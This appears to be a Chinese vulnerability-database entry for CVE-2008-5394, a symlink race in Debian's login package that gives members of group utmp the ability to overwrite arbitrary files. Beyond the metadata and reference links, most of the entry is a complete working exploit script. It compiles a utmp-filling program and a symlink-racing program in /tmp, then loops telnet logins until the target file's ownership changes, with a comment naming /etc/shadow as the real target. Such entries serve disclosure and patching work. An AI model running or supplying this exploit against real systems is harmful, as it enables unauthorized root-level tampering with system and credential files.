Debian Linux /bin/login软件包本地权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116905 漏洞类型 后置链接
发布时间 2008-12-01 更新时间 2009-03-10
CVE编号 CVE-2008-5394 CNNVD-ID CNNVD-200812-119
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/7313
https://www.securityfocus.com/bid/32552
https://cxsecurity.com/issue/WLB-2008120003
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-119
|漏洞详情
Debian是一个流行的Linux发行版本。Debian及其他一些Linux版本的login软件包没有安装的创建临时文件。utmp组中的本地用户可以通过创建从临时文件到系统中各种文件的符号链接来利用这个漏洞,导致以提升的权限覆盖系统上的任意文件。
|漏洞EXP
#!/bin/bash -

echo '
	#include <string.h>
	#include <stdlib.h>
	#include <unistd.h>
	#include <utmp.h>
	#include <sys/types.h>
	#include <stdio.h>

	int main(int argc, char *argv[])
	{
	  struct utmp entry;
	  int i;

	  entry.ut_type=LOGIN_PROCESS;
	  strcpy(entry.ut_line,"/tmp/x");
	  entry.ut_time=0;
	  strcpy(entry.ut_user,"badguy");
	  strcpy(entry.ut_host,"badhost");
	  entry.ut_addr=0;
	  for(i=1;i<9;i++) {
	    entry.ut_pid=(pid_t)( i + (int)getpid() );
	    sprintf(entry.ut_id,"bad%d",i);
	    pututline(&entry);
	  }
	}
' > /tmp/fillutmp.c

cc -o /tmp/fillutmp /tmp/fillutmp.c

echo 'Ask someone with group utmp privileges to do:'
echo '  chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp'
echo -n 'Press [RETURN] to continue... '
read ANS

echo '
	#include <unistd.h>

	int main(int argc, char *argv[])
	{
	  while(1)
	  {
	    unlink("/tmp/x");
	    symlink(argv[1],"/tmp/x");
	    unlink("/tmp/x");
	    symlink(argv[2],"/tmp/x");
	  }
	}
' > /tmp/jigglelnk.c

cc -o /tmp/jigglelnk /tmp/jigglelnk.c

HOST=`hostname` # or simply localhost?
echo "Which tty do you think a 'telnet $HOST' will use next?"
echo "(Do that telnet and see...)"
read TTY
echo "You said it will be '$TTY' ..."

ATK=/etc/debian_version # should be /etc/shadow

echo "Starting symlink re-jiggler ..."
/tmp/jigglelnk $TTY $ATK &
JIG=$!

LOOP=0
while :; do
  ((LOOP = $LOOP + 1))
  echo; echo; echo "Try = $LOOP"

  /tmp/fillutmp

  echo "Telnetting... if login succeeds, just exit for next try..."
  /usr/bin/telnet $HOST

  LS=`ls -ld $ATK`
  case "$LS" in
    *root*root* ) ;; # not done yet...
    * )
      echo; echo
      echo "Success after $LOOP tries!"
      echo "$LS"
      echo; echo
      break
    ;;
  esac
done

kill $JIG
rm /tmp/fillutmp /tmp/jigglelnk /tmp/x

# ...
# ~$ logout
# Connection closed by foreign host.
# Success after 12 tries!
# -rw------- 1 psz tty 4 Oct 28  2006 /etc/debian_version

# milw0rm.com [2008-12-01]
|受影响的产品
Ubuntu Ubuntu Linux 8.10 sparc Ubuntu Ubuntu Linux 8.10 powerpc Ubuntu Ubuntu Linux 8.10 lpia Ubuntu Ubuntu Linux 8.10 i386 Ubuntu Ubuntu Linux 8.10 amd64 Ubuntu Ubuntu L
|参考资料

来源:XF
名称:debian-login-symlink(47037)
链接:http://xforce.iss.net/xforce/xfdb/47037
来源:UBUNTU
名称:USN-695-1
链接:http://www.ubuntu.com/usn/usn-695-1
来源:BID
名称:32552
链接:http://www.securityfocus.com/bid/32552
来源:BUGTRAQ
名称:20081130/bin/logingivesroottogrouputmp
链接:http://www.securityfocus.com/archive/1/archive/1/498769/100/0/threaded
来源:MILW0RM
名称:7313
链接:http://www.milw0rm.com/exploits/7313
来源:MANDRIVA
名称:MDVSA-2009:062
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2009:062
来源:SREASON
名称:4695
链接:http://securityreason.com/securityalert/4695
来源:GENTOO
名称:GLSA-200903-24
链接:http://security.gentoo.org/glsa/glsa-200903-24.xml
来源:OSVDB
名称:52200
链接:http://osvdb.org/52200
来源:bugs.debian.org
链接:http://bugs.debian.org/505271
来源:bugs.debian.org
链接:http://bugs.debian.org/505071
来源:bugs.debian.org
链接:http://bugs.debian.org/332198